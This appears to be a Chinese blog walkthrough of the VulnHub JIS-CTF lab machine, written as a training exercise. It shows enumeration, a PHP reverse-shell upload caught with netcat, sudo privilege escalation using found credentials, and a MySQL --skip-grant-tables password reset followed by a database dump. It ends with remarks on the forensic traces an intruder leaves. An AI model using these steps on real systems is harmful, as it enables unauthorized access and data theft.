【VulnHub】JIS-CTF

实验环境：
靶机：192.168.0.149
攻击机kali：192.168.0.103

一、信息收集

1、masscan快速扫端口，发现22，80端口。

root@redwand:~# masscan -p0-65535 --rate=1000 192.168.0.149
Discovered open port 80/tcp on 192.168.0.149
Discovered open port 22/tcp on 192.168.0.149

2、nmap扫22，80服务版本号及漏洞。

root@redwand:~# nmap -sC -sV -p22,80 192.168.0.149
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries
| / /backup /admin /admin_area /r00t /uploads
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:0E:50:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3、入手80端口，dirb扫目录。

root@redwand:~# dirb http://192.168.0.149
---- Scanning URL: http://192.168.0.149/ ----
==> DIRECTORY: http://192.168.0.149/admin_area/
==> DIRECTORY: http://192.168.0.149/assets/
==> DIRECTORY: http://192.168.0.149/css/
==> DIRECTORY: http://192.168.0.149/flag/
+ http://192.168.0.149/index.php (CODE:302|SIZE:1228)
==> DIRECTORY: http://192.168.0.149/js/
+ http://192.168.0.149/robots.txt (CODE:200|SIZE:160)
+ http://192.168.0.149/server-status (CODE:403|SIZE:301)

---- Entering directory: http://192.168.0.149/admin_area/ ----
+ http://192.168.0.149/admin_area/index.php (CODE:200|SIZE:224)

---- Entering directory: http://192.168.0.149/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.149/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.149/flag/ ----
+ http://192.168.0.149/flag/index.html (CODE:200|SIZE:109)

---- Entering directory: http://192.168.0.149/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

4、whatweb查看环境。

root@redwand:~# whatweb 192.168.0.149/login.php
http://192.168.0.149/login.php [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.0.149], JQuery, PasswordField[pass_word], Script, Title[Sign-Up/Login Form]

5、逐一翻看web目录

• 发现登陆界面192.168.0.149/login.php
  
• 发现目录浏览漏洞，以及apache版本（ServerSignature on）。
  
• robots.txt文件发现目录。
  
• 访问http://192.168.0.149/flag/发现1st flag。
  
• http://192.168.0.149/admin_area/，源码中发现一组账号密码及2nd flag。
  
  
• 使用gobuster依次扫各目录下的txt文件。

root@redwand:~#  gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.149 -t 100 -x txt
/assets (Status: 301)
/css (Status: 301)
/js (Status: 301)
/flag (Status: 301)
/flag.txt (Status: 403)
/robots.txt (Status: 200)
/uploaded_files (Status: 301)
/hint.txt (Status: 200)
/server-status (Status: 403)

发现hint.txt，得到3rd flag及用户technawi。

访问其他目录均403，至此，前期信息收集基本完成。

二、getshell

1、使用得到的一组账号密码username : admin，password : 3v1l_H@ck3r登陆成功，发现上传点。

2、上传info.php，在/uploaded_files目录下找到上传文件，成功解析，验证上传漏洞。

3、上传php-reverse-shell反弹shell到kali攻击机，python3导入pty交互式得到shell。

root@redwand:~# rlwrap nc -lvp 6666
listening on [any] 6666 ...
192.168.0.149: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.149] 56148
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:28:10 up 52 min,  0 users,  load average: 0.00, 2.25, 3.94
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Jordaninfosec-CTF01:/$

三、提权

1、找到登陆用户technawi，并在家目录下发现.sudo_as_admin_successful文件，找到sudo提权线索。

www-data@Jordaninfosec-CTF01:/tmp$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
www-data@Jordaninfosec-CTF01:/home/technawi$ ls -al
ls -altotal 48
drwxr-xr-x 3 technawi technawi 4096 Apr 21  2017 .
drwxr-xr-x 3 root     root     4096 Apr 11  2017 ..
-rw------- 1 technawi technawi 4321 Apr 21  2017 .bash_history
-rw-r--r-- 1 technawi technawi  220 Apr 11  2017 .bash_logout
-rw-r--r-- 1 technawi technawi 3771 Apr 11  2017 .bashrc
drwx------ 2 technawi technawi 4096 Apr 11  2017 .cache
-rw-r--r-- 1 technawi technawi  655 Apr 11  2017 .profile
-rw-r--r-- 1 technawi technawi    0 Apr 11  2017 .sudo_as_admin_successful
-rw------- 1 root     root     6666 Apr 21  2017 .viminfo
-rw-r--r-- 1 root     root     7141 Apr 18  2017 1

2、依次排查进程，内核，未发现合适提权线索。
3、使用grep命令全局搜索technawi相关文件，找到敏感文件，得到账号密码。
grep命令选项
-r, --recursive 递归子目录
-i, --ignore-case 忽略大小写
-n, --line-number 显示行号
-s, --no-messages 不显示错误消息，功能类似于 2>/dev/null
–exclude-dir=proc/ 排除proc目录

www-data@Jordaninfosec-CTF01:/home/technawi$ grep -inrs "technawi" --exclude-dir=proc/ /
<1:/home/technawi$ grep -inrs "technawi" --exclude-dir=proc/ /
/etc/subgid:3:technawi:165536:65536
/etc/mysql/conf.d/credentials.txt:3:username : technawi
/etc/subuid:3:technawi:165536:65536
/etc/passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
/etc/group:5:adm:x:4:syslog,technawi
/etc/group:18:cdrom:x:24:technawi
/etc/group:21:sudo:x:27:technawi
/etc/group:23:dip:x:30:technawi
/etc/group:35:plugdev:x:46:technawi
/etc/group:49:lxd:x:110:technawi
/etc/group:54:technawi:x:1000:
/etc/group:55:lpadmin:x:115:technawi
/etc/group:56:sambashare:x:116:technawi

在/etc/mysql/conf.d/credentials.txt下找到账号密码

www-data@Jordaninfosec-CTF01:/home/technawi$ cat /etc/mysql/conf.d/credentials.txt
<1:/home/technawi$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

切换用户technawi，sudo su -提权成功

www-data@Jordaninfosec-CTF01:/home/technawi$ su - technawi
Password: 3vilH@ksor

technawi@Jordaninfosec-CTF01:~$ sudo su -
[sudo] password for technawi: 3vilH@ksor

root@Jordaninfosec-CTF01:~# whoami
root

最后在/home/technawi/flag.txt找到第四个flag，在/root目录下找到第五个flag。

四、获取数据库数据

既然是渗透测试，实战中肯定不光是拿到flag就完事了，我们看到了mysql数据库，那么能不能把数据导出拿回来呢。

• 在一个终端ssh登陆root，先关闭mysql服务，后mysqld_safe模式开启服务。

root@Jordaninfosec-CTF01:/var/www# mkdir -p /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# chown -R mysql:mysql /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# mysqld_safe --skip-grant-tables &
[1] 7262
root@Jordaninfosec-CTF01:/var/www# 2020-02-20T13:14:39.569415Z mysqld_safe Logging to syslog.
2020-02-20T13:14:39.571557Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-02-20T13:14:39.573679Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-02-20T13:14:39.586356Z mysqld_safe Starting mysqld daemon with databases from /var/lib/mysql

• 新开一个终端mysql -uroot无密码登陆

root@Jordaninfosec-CTF01:/tmp# mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

• 查看数据库

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)

• 查看mysql.user表

mysql> select host,user,authentication_string,plugin from user;
+-----------+------------------+-------------------------------------------+-----------------------+
| host      | user             | authentication_string                     | plugin                |
+-----------+------------------+-------------------------------------------+-----------------------+
| localhost | root             | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | mysql_native_password |
| localhost | mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | mysql_native_password |
| localhost | debian-sys-maint | *C46C96C2990814041379A76A744EE3E5026A0D64 | mysql_native_password |
+-----------+------------------+-------------------------------------------+-----------------------+

• 更新root密码为123456

mysql> update user set authentication_string=password("123456") where user="root";
Query OK, 0 rows affected, 1 warning (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 1
mysql>flush privileges;

• mysqldump导出需要的数据库

root@Jordaninfosec-CTF01:/tmp# mysqldump -uroot -p sys > sys.sql
Enter password:

至此，成功导出sys数据库，可以将文件下载回本地导入相同版本数据库继续分析数据。

五、花絮

1、受文件hint.txt内容干扰，误认为technawi文件密码可能存储在www-data可读的隐藏文件中，使用find查找所有隐藏文件，未找到密码。

www-data@Jordaninfosec-CTF01:/var/www/html$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
The 3rd flag is : {7645110034526579012345670}

www-data@Jordaninfosec-CTF01:/tmp$ find / -name "\.*" -perm -004 2>/dev/null
....
/etc/cron.weekly/.placeholder
/var/lib/apparmor/profiles/.apparmor.md5sums
/tmp/.XIM-unix
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout

覆盘思路1：
在提权信收集阶段，以及通过netstat发现服务器开启mysql服务，但通过查看/var/www/html内文件，未发现web连接mysql数据的相关配置文件，遂放弃mysql线索。

www-data@Jordaninfosec-CTF01:/var/www/html$ netstat -anput
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      2 192.168.0.149:56148     192.168.0.103:6666      ESTABLISHED 1693/sh
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 192.168.0.149:80        192.168.0.176:49846     ESTABLISHED -
udp        0      0 0.0.0.0:68              0.0.0.0:*

覆盘思路2:
对于CTF题目，很多敏感文件放在.txt后缀的文件中，可以通过find命令对服务器上所有可读txt文件进行排查。

www-data@Jordaninfosec-CTF01:/var/www/html$ find / -name "*\.txt" -type f -perm -004 2>/dev/null
...
/usr/src/linux-headers-4.4.0-72/arch/sh/include/mach-ecovec24/mach/partner-jet-setup.txt
/usr/src/linux-headers-4.4.0-72/scripts/spelling.txt
/etc/mysql/conf.d/credentials.txt
/var/www/html/uploaded_files/file.txt
/var/www/html/hint.txt
/var/www/html/robots.txt

2、一点发现&收获
webshell是一个非交互式的shell，因此使用webshell操作的命令不会记录在webshell用户www-data的家目录下的.bash_history文件中。但实际渗透中，常常使用python导入交互式shell，这样虽然使用方便，但也给溯源留下了.bash_history的文件痕迹。

www-data@Jordaninfosec-CTF01:/var/www$ exit
exit
$ cd /var/www
$ ls -al
total 16
drwxr-xr-x  3 www-data www-data 4096 Feb 20 05:13 .
drwxr-xr-x 14 root     root     4096 Apr 18  2017 ..
-rw-------  1 www-data www-data  760 Feb 20 05:13 .bash_history
drwxr-xr-x  8 www-data www-data 4096 Apr 21  2017 html